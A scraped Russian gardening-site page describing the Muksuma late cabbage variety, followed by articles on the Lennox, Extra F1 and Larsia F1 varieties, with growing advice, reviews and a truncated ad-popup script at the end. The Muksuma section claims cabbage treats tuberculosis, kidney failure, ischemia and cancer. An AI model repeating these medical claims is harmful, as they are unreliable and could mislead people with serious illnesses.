11 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика капусты сорта муксума

Характеристика капусты сорта Муксума

Капуста Муксума — двухлетнее растение, которое подходит для длительного хранения, транспортировки и переработки.

Характеристика капусты сорта Муксума

Характеристика сорта Муксума

Муксума — это один из сортов позднеспелой белокочанной капусты.

Описание культуры схоже с характерным для других видов, но имеет ряд особенностей:

Рекомендации к употреблению Срок созревания Количество дней созревания Масса кочана Плотность кочана Срок хранения Описание плода
Свежий вид;

Термическая обработка

Позднеспелый 135-140 2,4-3,5 кг 4,6 балла Длительный Головка округлая, плотная, зеленого оттенка, имеет характерный восковый налет.

Позднеспелые сорта капусты подходят для длительного хранения и поздней продажи. Капуста Муксума имеет мощную корневую систему, насыщенный зеленый оттенок, плотные мягкие листья. Поздние сорта не гибнут во время заморозков, успешно используется при засолке.

Состав капусты Муксума

Капуста имеет в составе минералы и клетчатку.

Она положительно влияет на организм, благодаря провитамину А, витаминам группы В, витамину U и витамину С.

Химический состав сорта Муксума:

  • пантотеновая и фолиевая кислоты;
  • фосфор, цинк, алюминий;
  • соли калия;
  • марганец, глюкоза, фруктоза;
  • фосфор, йод.

Энергетическая ценность Муксума на 100 г: белки 1,8; жиры 0,10; углеводы 4,70. Калорийная ценность на 100 г — 27 ккал.

Полезные свойства

Сорт Муксума улучшает обмен веществ

Листья кочана содержат важный витамин U, который борется с заболеванием двенадцатиперстной кишки, а также проявлением язвенной болезни. Благодаря этой особенности, листья капусты перерабатывают и активно используют в современной фармакологии.

Употребление сорта Муксума в свежем виде способствует улучшению обмена веществ, укреплению сосудов. Пищевые волокла в зеленых листах задерживают холестерин и желчные кислоты, не давая им всосаться в стенки кишечника.

Витамин С в химическом составе овоща имеет наиболее устойчивую формулу. Это помогает сохранять полезные действия витамина после любой термической обработки или заквашивания. Листья капусты Муксума имеют противовоспалительные свойства, благоприятно влияют на деятельность сердечной системы и регулируют выработку желудочного сока.

Применение капусты сорта Муксума

В медицине

Издавна капустный лист прикладывали к воспаленному месту, как компресс, оставляя на ночь для снятия отека и болезненных ощущений. Современная медицина использует листья овоща в лечении таких заболеваний:

  • язвенная болезнь и гастрит;
  • двенадцатиперстная кишка;
  • туберкулез;
  • почечная недостаточность;
  • болезнь селезенки;
  • ишемия;
  • профилактика гиповитаминоза С.

Свежий сок корнеплода Муксума используют для быстрого заживления ран и несильных ожогов. Кочерыжку овоща используют в борьбе с онкозаболеваниями. Муксума — одно из профилактических средств от депрессии и простудных заболеваний.

Противопоказания

Овощ не подходит людям, страдающим колитами. Его не следует включать в рацион при повышенной кислотности желудка.

В кулинарии

Капуста хороша в свежем виде

Лист овоща не требует дополнительной обработки. Он отлично подойдет для приготовления в сыром виде. Мягкие, но хрустящие листья подойдут для любого салата.

Закваска и маринование позднеспелого сорта, ничем не отличается от других сортов. Термическая обработка в составе с другими компонентами допустима. Сорт не имеет ярко выраженного запаха и вкуса.

Хранение и обработка

Капуста Муксума — это позднеспелый сорт, поэтому подходит для длительного хранения в специализированных местах или подвалах. Муксума сохраняет вкусовые качества и полезные свойства до середины зимы, не нуждается в дополнительной обработке.

Овощ способен выдерживать длительную транспортировку. При правильном аккуратном передвижении кочаны не теряют товарного вида.

Посадка и выращивание сорта

В отличие от других овощей капуста Муксума способна приспосабливаться к разным климатическим условиям. Корнеплод неприхотлив к почве, поэтому для посадки подойдет даже тяжелый грунт. Сорт выращивают с помощью семян или рассады.

Как правильно выбрать семена и рассаду

Выбирают чистую, сухую, неповрежденную упаковку, на которой указано полное название культуры и сорта. Производитель, маркировка, номер парии, юридический адрес компании, срок годности — все должно быть указано на пачке.

F1 — специальная маркировка гибридных сортов растений (только положительные генетические предрасположенности). Упаковки с такой маркировкой содержат отобранные обработанные семена.

Качество рассады при покупке определяют по внешнему виду куста. Стебли капусты Муксума должны быть толстыми и длинными, листья — крупными.

Посадка и уход

Семена капусты Муксума сеют в первой половине апреля. При поздней посадке кочаны овоща не успевают сформировать головки. Рассаду, взошедшую после посева, можно пересаживать в открытый грунт через 46-50 дней.

Перед посадкой рассады почву необходимо подготовить:

  • осенью перекопать подготовленный участок, не выравнивая: так земля впитает максимальное количество влаги;
  • обработать почву противопаразитными средствами;
  • обильно полить за день до посадки;
  • подготовить лунки, перемешать землю с торфяным удобрением.

В готовую лунку пересаживают молодой корнеплод и присыпают его сухой землей. Саженцы ежедневно поливают в течение 10 дней. На третью и четвертую неделю каждый куст окучивают. Зрелые плоды собирают в конце осени.

Заключение

Белокочанная капуста способна долгое время сохранять полезные витамины. Овощ можно употреблять в любом виде.

Капуста Муксума неприхотлива к погодным условиям, хорошо плодоносит. Кочан тугой и сочный, подходит для длительного зимнего хранения.

Муксума — сорт растения Капуста белокочанная

Характеристики сорта:

Свойства сорта Муксума:

Рекомендуемый регион на карте:

Информация о допуске Капуста белокочанная Муксума из Реестра Госсорткомиссии РФ

Заявка на допуск №52619 , зарегистрирована 2009-09-18 . Сорт Капуста белокочанная Муксума включен в реестр допущенных в 2011 году . Допущен к использованию в регионах: Северо-Западный, Центральный, Волго-Вятский .

Оригинатором сорта Капуста белокочанная Муксума является:

  • RIJK ZWAAN ZAADTEELT EN ZAADHANDEL B.V.
    (BURGMEESTER CREZEELAAN 40, P.O. BOX 40, 2678 ZG DE LIER, NIEDERLANDE)

Другие сорта растения Капуста белокочанная

Поиск сорта по названию
Подбор сорта
Вопрос экспертам портала

Если вы не нашли ответ на вопрос — не стесняйтесь, задайте вопрос эксперту.

Зарегистрируйтесь или Войдите, чтобы каждый раз не указывать Имя и Электронную почту

Спасибо за комментарий! Он будет опубликован после проверки модератором!

Комментариев еще нет, станьте первым!

Портал для тех, кто любит свою дачу

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Помогите нашему сайту развиваться!

Пожалуйста, прочитайте это обращение, оно не отнимет у вас много времени!

Нам так не хватает ваших комментариев и вопросов, чтобы понимать в каком направлении нам развиваться.

Не забудьте оставить комментарий, если вы нашли то что искали.
А если не нашли — задайте вопрос через форму «Спросить эксперта» в шапке сайта.
Мы ответим на этот вопрос, и другие посетители смогут найти ту информацию, которую не смогли найти вы.

С уважением,
команда портала Дача-Дача.ру

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Капуста «Леннокс» описание и характеристика позднего сорта

Леннокс: описание позднего сорта белокочанной капусты, отзывы, выращивание, посадка и уход

Основными положительными качествами капусты Леннокс являются хорошая урожайность, стойкость к большинству болезней, неприхотливость к условиям выращивания, а также способностью расти и плодоносить при нехватке влаги в грунте.

Об этих и других характеристиках капустного сорта Леннокс F1, основных достоинствах, агротехнике выращивания будет рассказано ниже.

Капуста Леннокс: характеристика и описание сорта

Данный сорт был выведен голландскими селекционерами. И как все сорта овощей, выведенные в Нидерландах, эта капуста обладает большим количеством положительных качеств. Начать стоит с описания растения и его основных характеристик.

Капуста Леннокс является позднеспелым гибридом. Кочаны созревают через 5-5,5 месяцев после прорастания семенного материала. Ее рекомендуют выращивать как на частных подворьях, так и в промышленных целях. Способы выращивания – как рассадный, так и безрассадный.

Фото капусты Леннокс

Листовые розетки капусты Леннокс – удобные, среднего размера, полуприподнятые. Листва- крупного или среднего размера, их форма – округлая, вогнутая. Поверхность листовых пластин – морщинистая, окраска – изумрудная с серым отливом, с восковым налетом. У данного сорта очень мощные корни, поэтому она прекрасно переносит периоды засухи.

Кочаны – округлые, уплотненные, наполовину прикрытые кроющей плотной листвой. Окраска – зеленая с серым отливом. Средний вес вызревших плодов – 1,7-2,3 кг. Кочерыжка – небольшого размера. Плоды капусты Леннокс не склонны к растрескиванию.

В 100 г этой капусты присутствуют следующие ингредиенты:

  • сахара – до 5%;
  • белков – не менее 0,55%;
  • сухих веществ – около 8,4%;
  • аскорбиновой кислоты – до 41,8 мг.

Видео описание капусты Леннокс

Собранные кочаны – универсального назначения, их можно солить и квасить, использовать для приготовления салатов и горячих блюд. Вкус капусты – сладковатый, сохраняется в течение практически всего времени хранения. Собранный урожай Леннокса в соответствующих условиях может храниться до 7-7.5 месяцев.

И даже спелые кочаны, если их вовремя не собирают, «на кусту» долго стоят, не растрескиваясь и не теряя своих вкусовых качеств. Многие дачники отмечают, что если кочаны капусты Леннокс на огороде затронет небольшое похолодание (до -2-3 градусов Цельсия), то становятся более сладкими и сочными.

Урожайность сорта капусты Леннокс

Кочаны капусты Леннокс созревают практически одновременно. С каждого квадрата в зависимости от ухода можно собирать от 5 до 12 кг качественных вилков, не склонных к растрескиванию.

Фото семян Капусты Леннокс

Достоинства и недостатки

К главным достоинствам сорта капусты Леннокс следует отнести:

    кочаны не склонны к растрескиванию;

урожай созревает дружно и одновременно;

кочаны примерно одинаковы по размерам и плотности;

товарный вид и вкусовые качества кочанов капусты Леннокс долго сохраняются на корню и при хранении;

Из недостатков можно выделить только низкую устойчивость овощного растения к киле и к поражению капустной мухой.

Болезни и вредители капусты

Капуста Леннокс имеет средний иммунитет и обладает неплохой устойчивостью к следующим заболеваниям:

  • черной ножке;
  • слизистому бактериозу;
  • сосудистому бактериозу.

Но вот к такой болезни, как кила, иммунитета у данного гибрида нет, поэтому с этой напастью огородникам приходится часто бороться. Если растения поражаются килой уже в процессе созревания кочанов, то бороться с болезнью слишком сложно. Поэтому все больные растения удаляют и немедленно сжигают. А оставшиеся капустные кустики следует тщательнее окучивать и обильнее поливать. Осенью следует перекопать грунт, добавляя в него свекольную ботву.

Видео про болезни капусты

Грибок, вызывающий данную болезнь, может оставаться жизнеспособным в течение 5-6 сезонов. Поэтому на тех грядках, где было обнаружено заболевание, крестоцветные нельзя выращивать в течение этого периода. Чтобы обеззаразить такой участок, после уборки урожая его проливают раствором извести пушонки (на каждый квадрат необходимо до 600 г порошка).

А при высаживании данной овощной культуры на других грядках, в каждую посадочную ямку вливают 1,5 стакана известкового молока.

На участке, пораженном килой, высаживают растения, способные погубить патогенный грибок. Это могут быть овощные культуры из семейства пасленовых, лилейных или маревых.

Также капуста Леннокс может поражаться капустной мухой. Бороться с ней можно с помощью опрыскивания специальными инсектицидными препаратами, либо народными средствами.

Капуста Леннокс: агротехника выращивания, посадка и уход за сортом

На рассаду семена капусты Леннокс высевают в первой декаде апреля. Пикировать подрастающие сеянцы следует на стадии образования семядольных листочков.

Высадку рассады Леннокса на постоянное место производят через 1,5 месяца после появления ростков, когда на растениях появилось не менее 5 постоянных листьев. Обычно это происходит во второй декаде мая. Схема посадки: 0,7*0,5 м.

Посадка поздней капусты на рассаду — видео от бывалого огородника

В посадочные лунки перед высадкой рассады обычно добавляют древесную золу и минеральные удобрения. Следует также следить за кислотностью грунта – она должна быть нейтральной.

Дальнейший уход за подрастающей капустой Леннокс заключается в соблюдении поливного режима, рыхлении междурядий с одновременным удалением сорной травы, а также в периодичном внесении подкормок. При внесении удобрений рекомендуется чередовать органику и минеральные удобрения.

Капуста Леннокс: отзывы тех, кто сажал

На форумах огородников многие дачники оставляют свои отзывы о позднеспелом сорте капусты Леннокс. Некоторые из них представлены ниже.

Капуста Леннокс — фото и отзывы

Капусту Леннокс стоит посадить на своем огороде в том случае, если овощеводы хотят получить урожай, который можно сохранить в соответствующих условиях до следующего сезона. А если этой овощной культуре обеспечен хороший уход, то плодоношение будет дружным и обильным.

Капуста Леннокс F1: описание и характеристика сорта от производителя

Позднеспелый (165-175 дней) гибрид. Розетка листьев полуприподнятая. Лист серо-зеленый с сильным восковым налетом. Кочаны округлые, полуприкрытые, плотные, с большим количеством гладких, серо-зеленых, кроющих толстых листьев, массой 1,6-2,4 кг. Вкусовые качества отличные.

Ценность гибрида: устойчивость к растрескиванию, дружное формирование урожая, выравненность и плотность кочанов, долго сохраняет товарные качества на корню и при хранении. Рекомендуется для употребления в свежем виде и для кулинарной переработки.

Производители: Седек, Престиж, Плазменные семена и другие.

Описание сорта капусты Экстра F1

Белокочанный гибрид Экстра F1 – это позднеспелая отечественная капуста. Селекцией данного гибрида занимались специалисты из Селекционной станции им. Н.Н. Тимофеева и ГП «Россортсемовощ». В 97-м году Экстра F1 была включена в Госреестр РФ. Рекомендована для культивации в Северо-Западном регионе.

Среди предпринимателей этот сорт в первую очередь ценится за его пригодность к механической уборке.

В публикации вы сможете прочитать описание сорта, увидите фото и отзывы дачников, которые культивировали этот уникальный гибрид.

Характеристика

Гибрид является позднеспелым овощем. Период от всходов и до полного созревания культуры длится порядка 154-170 суток. Урожайность находится на среднем уровне. С 1 м2 можно собрать до 4.2 кг товарной продукции.

У представителей Экстра F1 розетка полуприподнятого типа, высотой до 34 см и диаметром порядка 55 см. Листовая пластина небольшая, обратнояйцевидной формы. Черешок очень короткий. Поверхность листа гладкая, по краям есть волнистость, но выражена она очень слабо. Окрас листа – темно-зеленый. На поверхности также есть сильное восковое напыление. Наружная кочерыга достаточно длинная и может вырастать до 15 см.

Кочаны формируются ровные, плоско-округлой формы. Высота головы до 18 см. Структура очень хорошая, плотная. Благодаря чему не возникает никаких проблем при транспортировке «голов» или сборе механическим способом.

Снаружи кочан окрашен в зеленый цвет, внутри капуста бело-желтая. Внутренняя кочерыга около 6 см в длину. Масса технически зрелого овоща достигает 3 кг, хотя в среднем находится в диапазоне 2.2-2.8 кг.

Вкусовые качества у Экстра F1 очень хорошие. Также, капуста подходит для длительного хранения.

Что касается иммунитета, то гибрид защищен от таких заболеваний как:

  • Различные проявления бактериозов.
  • Серой гнили.
  • Фузариозного увядания.

Достоинства и недостатки капусты

Экстра F1 имеет ряд достоинств, среди которых в первую очередь стоит отметить:

  1. Длительный срок хранения урожая.
  2. Капуста не повреждается при механическом способе уборки.
  3. Имеет защиту от таких заболеваний как серая гниль, фузариозное увядание и различные проявления бактериозов.
  4. Подходит для употребления как в свежем виде, так и для переработки (в частности квашения).
  5. Внутри кочана находится относительно небольшая кочерыга.

Недостатков, как таковых – нет. Единственный небольшой минус – это большая внешняя кочерыга. Из-за нее придется в обязательной мере проводить 2 окучивания за сезон. Иначе капуста может опрокинуться на бок при полном вызревании «головы». Также многие садоводы отмечают, что листья у гибрида достаточно жесткие.

Отзывы садоводов

Владимир Иванович, г. Воронеж, 43 года.

Высаживала как-то раз эту капусту для личного употребления. На пробу, так сказать. Есть конечно в этой капусте свои плюсы и минусы, но лично для меня минусов больше. По порядку. Сразу скажу, что лежит капуста очень долго. У нас пролежала до апреля. Может быть лежит и дольше, но последнюю голову съели как раз в апреле. Также, кочаны очень плотные, что хорошо. А вот теперь о недостатках. Вкус, как по мне, не очень. Все из-за жесткости. Листья очень жесткие. Также пробовала ее солить, но и в таком виде она мне не понравилась. Больше не выращиваю.

Дмитрий Игоревич, г. Киев, 39 лет.

Мне Экстра f1 понравилась. Выращивала раньше Каменную голову, так вообще не понравилась, точно, что каменная. Об капустину и зайцы зубы сломают. А вот этот гибрид довольно хороший. Лежит долго, не пресная, сочная. Листья жестковатые, но терпимо, в любом случае если сравнивать с Каменной головой, то разница на глаза.

Описание и характеристика сорта капусты Ларсия F1

Капуста Ларсия F1 отлично зарекомендовала себя на фермерских полях. Гибрид привлекает внимание огородников высокой урожайностью и другими особенностями, которые будут подробно рассмотрены ниже.

Описание и характеристика

Ларсия F1 — один из современных гибридов белокочанной капусты от концерна Seminis.

Основные характеристики и показатели данного овоща таковы:

  • кочан приплюснутый, овально-круглой формы;
  • цвет белый, с зелёным оттенком, на срезе — белый;
  • кочан плотный и гладкий, внутри однородный с тонкими прожилками;
  • кочерыжка короткая;
  • наружные листья тёмно-зелёные, с восковым налётом;
  • размер листовой розетки средний;
  • средняя масса кочана 4–6 кг, максимум 8 кг;
  • урожайность 240–280 ц/га.

Гибрид относится к овощам среднепозднего срока созревания и среднее время его выращивания в открытом грунте составляет 110–115 дней, при этом уже к 80 дню кочаны пригодны к срезке и дальнейшей переработке. Вкусовые качества овоща уже в момент сбора урожая находятся на высоком уровне, что выгодно отличает его от тех сортов, которые набирают вкус и хрусткость только при длительном хранении.

Преимущества и недостатки

  • Преимущества гибрида следующие:
  • высокая стабильная урожайность;
  • отличные товарные характеристики кочанов;
  • устойчивость к заболеваниям, в том числе трипсам;
  • не трескается;
  • длительное хранение на корню и после уборки;
  • универсальное применение (в свежем и переработанном виде, для закваски и солений).

Гибрид занимает ведущие места в сегменте среднепоздних капуст и явных недостатков не имеет.

Оптимальные сроки выращивания

Сроки высева зависят от климатических условий конкретного региона. Приступать к высеву семенного материала рекомендуется, обычно, в начале весны (последние недели марта). В южных районах пересадку в открытый грунт можно проводить до июля месяца, если климатические условия не помешают собирать урожай в середине осени.

Видео: Капуста Ларсия F1

Правила выращивания

Агротехника гибрида Ларсия F1 не имеет особых требований и совпадает с основными правилами при выращивании белокочанной капусты.

Выбор и подготовка семян

Для выращивания гибридных культур выбор и покупка семенного материала имеют первостепенное значение, поскольку только из семян проверенного производителя можно получить растение с заданными свойствами.

Обычно перед посевом рекомендуется провести замачивание семян, чтобы увеличить их всхожесть и продезинфицировать. Однако фирменные семена, чаще всего, продаются обработанными фунгицидами. Они окрашены в яркие цвета и не требуют дополнительной обработки перед посевом.

Если семена не окрашены и на пакете нет соответствующего предупреждения, можно провести такие действия:

  1. Поместить семена в 3% раствор поваренной соли на 10 минут, после чего собрать те из них, что опустились на дно. Солевой раствор необходимо смыть, а отобранные семена сразу просушить.
  2. Для обеззараживания семена поместить в крепкий раствор марганцовки или раствор толчёного чеснока (30 г на 1 стакан воды) и оставить на час. После обработки семена промыть чистой водой и просушить.
  3. Для предварительного закаливания замоченные семена выдержать в холодильнике при +1…+2°C один день.

Выращивание рассады

Для выращивания рассады можно купить готовую почвосмесь в магазине или садовом центре, а также приготовить почву самостоятельно в такой пропорции:

  • по одной части перегноя и дёрновой земли;
  • 1 ст. л. золы на 1 кг почвенной смеси.

Землю необходимо предварительно продезинфицировать раствором марганцовки или прокаливанием в духовом шкафу.

Для рассады также понадобятся ящик или специальный пластиковый контейнер, а для второго этапа, после пикировки, понадобятся уже индивидуальные ёмкости для каждого растения. Перед посевом грунт нужно обильно полить, а следующее увлажнение выполняют уже после появления всходов. Такой приём является профилактикой «чёрной ножки» на всходах капусты.

Капуста является холодостойким растением и для быстрого прорастания семян будет достаточно температуры +18…+20°C. Чтобы избежать излишней вытянутости, всходы капусты необходимо держать при невысоких температурах, около +8°C, особенно в ночное время. Через неделю температуру повышают до +12…+15°C. При необходимости, рассаду досвечивают специальными лампами, обеспечивая ей 12–15-часовой световой день.

Первые всходы прореживают таким образом, чтобы каждый сеянец имел площадь земли около 2 см². Полив всходов должен быть очень умеренным водой комнатной температуры. Пикировку начинают при появлении 1-2 настоящих листьев, что соответствует, примерно, сроку жизни в 10 дней. Пересадку производят в такую же почвенную смесь, при этом сеянцы заглубляют до семядольных листиков. Если корни растения очень длинные, их обрезают на треть. Рассаду, выращиваемую без пикировки, в это время нужно снова проредить, оставляя интервалы в 5-6 см.

Рассада капусты нуждается в дополнительной подкормке по такой схеме:

  • через неделю после пикировки на 1 л воды добавляют 4 г суперфосфата и по 2 г калийных удобрений и аммиачной селитры. Этой смеси хватит примерно для 50 сеянцев, которые следует предварительно полить водой;
  • через 2 недели количество добавок на 1 л удваивают;
  • за 2-3 дня до высадки рассаду удобряют раствором, в котором содержится 8 г калийных удобрений на 1 л воды, а также добавлены 5 г суперфосфата и 3 г селитры.

Подготовка участка

Участок для выращивания культуры должен быть светлым и плодородным. Культура демонстрирует лучшую урожайность на суглинках с высоким процентом гумуса при слабокислой или нейтральной реакции почвы. Лучшие предшественники для капусты — морковь, лук, огурцы и горох. Не стоит выращивать капусту после кукурузы, а также возвращать овощ на то же место. Вновь посадить капусту на грядке можно только через 3-4 года.

Для капусты необходим ровный участок, а в сырых низинах рекомендована посадка на гребень.

Удобрения в почву вносятся при осенней или весенней подготовке грядки, а также можно добавить удобрения в каждую лунку при посадке:

  • 500 г перегноя;
  • 1 ч. л. нитрофоски;
  • 2 ст. л. золы.

Пересадка рассады в грунт

За 10–12 дней до высадки рассады проводят её закаливание, постепенно приучая к низкой температуре и прямому солнечному свету. В первый день в помещении с капустой открывают форточку на 3-4 часа, затем контейнеры выносят на балкон и, в итоге, оставляют на дневное время на улице. Перед первыми лучами солнца растения слегка притеняют, чтобы избежать ожога.

За неделю до высадки значительно сокращают или полностью прекращают полив, что позволяет затормозить рост растений. Вечером перед днём посадки рассаду обильно поливают. Посадку лучше проводить в пасмурный день или после полудня в солнечную погоду.

Уход за растением

Уход за посадкой капусты состоит в контроле за влажностью и правильном окучивании, а также своевременных подкормках.

Нормы полива

Правильный полив — залог получения высокого урожая, поскольку капуста является влаголюбивым растением и для формирования крупных кочанов необходимо много воды. В то же время, излишнее переувлажнение может привести к задержке роста овоща.

Существует три способа полива:

    Самый простой вариант — по бороздам, однако это требует ровного рельефа и не даёт равномерного увлажнения. При поливе по бороздам тяжело увлажнить корни молодых саженцев после высадки. Этот способ не подходит для супесчаных и песчаных почв.

Дождевание подходит для участка с любым рельефом и с любым грунтом. Этот способ позволяет регулировать нужную норму, регулировать влажность и освежать растения в жару. Недостатком способа является корка после полива, неравномерность при сильном ветре и существенные энергозатраты.

Капельный полив наиболее рационален, позволяя экономить воду и подавать её только к растению. Однако этот способ имеет и наивысшую себестоимость, а также требователен к качеству воды.

В первые 2 недели после пересадки, капусту поливают через каждые 3-4 дня, расходуя около 6–8 л на 1 м². Последующие поливы при нормальных погодных условиях можно проводить раз в неделю из расчёта 10–12 л на 1 м².

Полив лучше проводить утром или вечером, при этом желательная температура воды составляет около +20°C. В жаркую погоду рекомендуется также проводить освежающее дождевание (утром или вечером). Полив сокращают в период созревания кочана.

Внесение удобрений

Количество удобрений, необходимых для правильной вегетации овоща, зависит от плодородия почвы и её подготовки перед посадкой. Наиболее эффективными являются подкормки в период максимального роста листьев и во время формирования кочана.

Рекомендованный график подкормок следующий:

  • через 2 недели после высадки рассады проводят подпитку раствором коровяка (1:10, по 500 мл на 1 саженец). Эту подкормку можно пропустить, если удобрения добавлялись в лунку при посадке;
  • вторая подкормка выполняется через месяц после посадки и по составу идентична первой;
  • третья подкормка наступает через 2 недели после второй. В тот же раствор коровяка добавляют по 30 г суперфосфата на 10 л воды и выливают по 1–1,5 л на куст;
  • тем же раствором можно провести четвёртую подкормку через 20 дней.

Рыхление и окучивание

Когда рассада хорошо прижилась, проводят прополку сорняков и первое рыхление. Глубина рыхления в первый раз составляет 4-5 см. Через неделю процесс повторяют на глубину 6–8 см. Последующие рыхления проводят до смыкания листвы соседних растений на глубину 8–10 см.

Окучивание позволяет получить дополнительные корни и его проводят через 25 дней после высадки рассады в открытый грунт. Его выполняют после полива или подкормки, подгребая почву к первым настоящим листьям. Поскольку Ларсия F1 имеет короткую кочерыжку, второе окучивание не требуется.

Вредители и болезни

Данный гибрид обладает устойчивостью к трипсам и бактериозу. Кочаны редко поражаются гусеницами, что особенно заметно при посадке разных видов на соседних грядках.

При нападении крестоцветной блошки используют обработку «Интавиром».

Возможные заболевания капусты часто связаны с неправильной подготовкой почвы и несоблюдении принципов севооборота.

Растение может получить такие болезни:

    кила— грибковое заболевание, разносится спорами и живёт в кислом грунте. Основная мера профилактики — раскисление почвы до 5,5–6,5 pH. Также помогает обработка рассады за неделю до высадки 3% бордосской жидкостью;

ложномучнистая роса образует на нижней стороне листьев серый налёт, а с лицевой стороны могут появиться жёлтые пятна. Важно не переувлажнять посадки, а больные растения обрабатывают 1% бордосской жидкостью.

Сбор и хранение урожая

Гибрид отлично хранится на корню, позволяя растянуть срок уборки урожая. После сбора, кочаны хранятся 4–8 месяцев.

Уборку лучше всего проводить в сухую погоду, срезая кочаны острым ножом. Если запланировано хранение в подвесе, кочерыжку оставляют длинной, в иных случаях срезают до 2-3 см. Два верхних укрывных листа оставляют для дополнительной защиты кочана.

При первичной сортировке для длительного хранения отбраковывают следующие овощи:

  • недоразвитые кочаны («недогон»);
  • механически повреждённые и треснувшие;
  • подмороженные или со следами вредителей.

Оптимальные условия хранения таковы:

  • температура от 0°C до +2°C;
  • влажность 85–95%;
  • отсутствие плесени и грибков;
  • ежемесячное проветривание.

При соблюдении вышеназванных условий капусту можно разместить на длительное хранение:

  • в ящике или коробе, при этом кочаны размещают в один слой и не дают им соприкасаться;
  • на полках, располагая овощи кочерыжкой вверх и завернув их в бумагу;
  • в песке, для чего кочерыжку полностью обрезают, а кочаны укладывают слоями и пересыпают сухим песком. Также можно воткнуть кочан кочерыжкой (не менее 8 см) в слой песка глубиной 20 см;
  • штабелями, сколотив из реек специальные формы, которые обеспечат капусте оптимальную вентиляцию;
  • подвесив каждый кочан в отдельности за кочерыжку к потолку.

При хранении в холодильнике капусту помещают в зону свежести или отделение для овощей на минимальную температуру. Кочан заворачивают в плёнку или бумагу.

Капуста Ларсия F1 может употребляться в пищу в свежем виде, а также является одним из лучших сортов для квашения и соления. Белокочанная капуста является вкусной начинкой для пирогов и вареников, используется для приготовления супов и гарниров.

Данный гибрид рекомендуется для выращивания как на фермерских, так и на приусадебных хозяйствах. При традиционной агротехнике, капуста обладает рядом неоспоримых преимуществ по сравнению с большинством сортов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
